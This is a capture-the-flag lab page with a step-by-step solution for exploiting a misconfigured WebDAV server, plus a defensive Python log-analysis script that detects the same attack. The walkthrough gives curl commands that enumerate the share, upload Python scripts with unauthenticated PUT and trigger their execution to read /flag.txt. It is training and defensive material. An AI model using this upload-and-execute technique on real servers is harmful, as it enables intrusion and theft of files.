
WebDAV Explorer

📁 Can you exploit the WebDAV server to access restricted files?

This corporate file server uses WebDAV for remote file management, but a misconfiguration in the access controls creates a dangerous security flaw. 📂 Many organizations rely on WebDAV for file sharing and collaboration, making it a common target for attackers seeking to upload malicious files or access sensitive data. Master this file server exploitation technique and discover how weak WebDAV configurations can lead to complete system compromise! 🎯

1 flag · 5 points · 88% success rate
This solution is for Flags Mode

This walkthrough explains how to hack the lab and capture the flags. For help with Learning Mode questions, use the Request Hint button next to each question.


📁 WebDAV Explorer - Complete Solution

Objective: Exploit WebDAV server misconfigurations to upload Python files and achieve remote code execution to access the system flag.

🔍 Step 1: WebDAV Discovery

Test if the server supports WebDAV by using HTTP OPTIONS method:

curl -X OPTIONS http://<target-ip>/ -v

Look for WebDAV methods in the Allow header of the response, such as PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK and PUT. A DAV header in the same response confirms WebDAV support.

🔍 Step 2: Directory Enumeration

Use PROPFIND method to enumerate directories and files:

curl -X PROPFIND -H "Depth: 1" http://<target-ip>/webdav/

The Depth: 1 header asks for the collection and its direct children; without it many servers (Apache mod_dav by default) refuse the request. The 207 Multi-Status XML response reveals the WebDAV directory structure with existing files and folders.

🔍 Step 3: File Upload Testing

Test file upload capability using PUT method:

curl -X PUT http://<target-ip>/webdav/test.txt -d "Hello WebDAV"

Successful upload indicates the server accepts file uploads via WebDAV.

🔍 Step 4: Python File Upload

Upload a Python script to test code execution:

curl -X PUT http://<target-ip>/webdav/test.py -d "import os; print('Current directory:', os.getcwd())"

🔍 Step 5: Code Execution Discovery

Access the uploaded Python file to test execution:

curl http://<target-ip>/webdav/test.py

If the server executes Python files, you'll see the script output instead of the source code.

🔍 Step 6: Flag Extraction

Upload a Python script to read the system flag:

curl -X PUT http://<target-ip>/webdav/getflag.py -d "import os; print(open('/flag.txt').read())"

🔍 Step 7: Execute Flag Script

Access the flag extraction script to retrieve the flag:

curl http://<target-ip>/webdav/getflag.py

The server executes the Python code and returns the flag content from /flag.txt.

🛡️ Security Implications

This vulnerability demonstrates how a WebDAV share that both accepts unauthenticated PUT uploads and executes the uploaded files as server-side scripts can lead to complete system compromise: file upload turns directly into remote code execution. Either control on its own breaks the chain: requiring authentication for write methods (PUT, MKCOL, MOVE, COPY, PROPPATCH, DELETE), or serving the WebDAV directory as static content with script handlers disabled so that an uploaded .py file is returned as text rather than run.
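As an added example, written from the defender's side and not part of the lab page or its solution: a Python script that finds the upload-then-execute chain from Steps 1 to 7 in web server access logs. It flags three things, each tied to a step above: a successful WebDAV write with no authenticated user, a successful PUT of a file with a script extension, and a later GET of that same file answered with 200 (the execution step). The log lines, client addresses and the /webdav/ prefix are constructed for the example; the combined log format is an assumption about the server.

```python
"""Detect the WebDAV upload-then-execute chain in access logs (added example)."""
import re

# Apache/nginx "combined" format: client, ident, authuser, [time], "METHOD path proto", status, ...
# Assumed format; adjust the pattern if your server logs differently.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Extensions a WebDAV share should never both accept for upload and execute.
SCRIPT_EXTS = (".py", ".php", ".jsp", ".asp", ".aspx", ".cgi", ".pl", ".sh")

# WebDAV methods that modify the share and should require authentication.
WRITE_METHODS = {"PUT", "MKCOL", "MOVE", "COPY", "PROPPATCH", "DELETE"}

# Constructed sample log (not captured from the lab): one client walks the chain,
# a second authenticated client uploads an ordinary document.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "OPTIONS / HTTP/1.1" 200 0 "-" "curl/8.4.0"
203.0.113.7 - - [10/Mar/2024:12:00:05 +0000] "PROPFIND /webdav/ HTTP/1.1" 207 512 "-" "curl/8.4.0"
203.0.113.7 - - [10/Mar/2024:12:00:09 +0000] "PUT /webdav/test.txt HTTP/1.1" 201 0 "-" "curl/8.4.0"
203.0.113.7 - - [10/Mar/2024:12:00:14 +0000] "PUT /webdav/test.py HTTP/1.1" 201 0 "-" "curl/8.4.0"
203.0.113.7 - - [10/Mar/2024:12:00:20 +0000] "GET /webdav/test.py HTTP/1.1" 200 58 "-" "curl/8.4.0"
198.51.100.20 - alice [10/Mar/2024:12:01:00 +0000] "PUT /webdav/report.docx HTTP/1.1" 201 0 "-" "Microsoft-WebDAV-MiniRedir/10.0"
198.51.100.20 - alice [10/Mar/2024:12:01:30 +0000] "GET /webdav/report.docx HTTP/1.1" 200 9000 "-" "Microsoft-WebDAV-MiniRedir/10.0"
"""


def parse_line(line):
    """Return a dict for one access-log line, or None if the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop any query string
    return rec


def find_webdav_abuse(lines, dav_prefix="/webdav/"):
    """Scan log lines in order and return alerts for the upload-then-execute chain.

    Alert kinds:
      unauth_write   - a WebDAV write method succeeded with no authenticated user
      script_upload  - a file with an executable extension was PUT successfully
      script_fetched - an uploaded script was later requested and served with 200,
                       which on a misconfigured server means it was executed
    """
    alerts = []
    uploaded_scripts = {}  # path -> client that uploaded it
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith(dav_prefix):
            continue
        ok = 200 <= rec["status"] < 300
        if rec["method"] in WRITE_METHODS and ok and rec["user"] == "-":
            alerts.append({"kind": "unauth_write", "ip": rec["ip"],
                           "path": rec["path"], "method": rec["method"]})
        if rec["method"] == "PUT" and ok and rec["path"].lower().endswith(SCRIPT_EXTS):
            uploaded_scripts[rec["path"]] = rec["ip"]
            alerts.append({"kind": "script_upload", "ip": rec["ip"],
                           "path": rec["path"], "method": "PUT"})
        if rec["method"] == "GET" and rec["status"] == 200 and rec["path"] in uploaded_scripts:
            alerts.append({"kind": "script_fetched", "ip": rec["ip"],
                           "path": rec["path"], "method": "GET",
                           "uploader": uploaded_scripts[rec["path"]]})
    return alerts


if __name__ == "__main__":
    for alert in find_webdav_abuse(SAMPLE_LOG.splitlines()):
        print(alert)
```

On the sample log this yields four alerts: two unauthenticated writes (test.txt and test.py), one script upload (test.py) and one fetch of that script. The authenticated upload of report.docx produces nothing, which is the behaviour you want from a rule that is meant to run continuously against a real share. The script_fetched alert is the one worth paging on; the unauth_write alerts are the configuration finding that should be fixed before the chain can start.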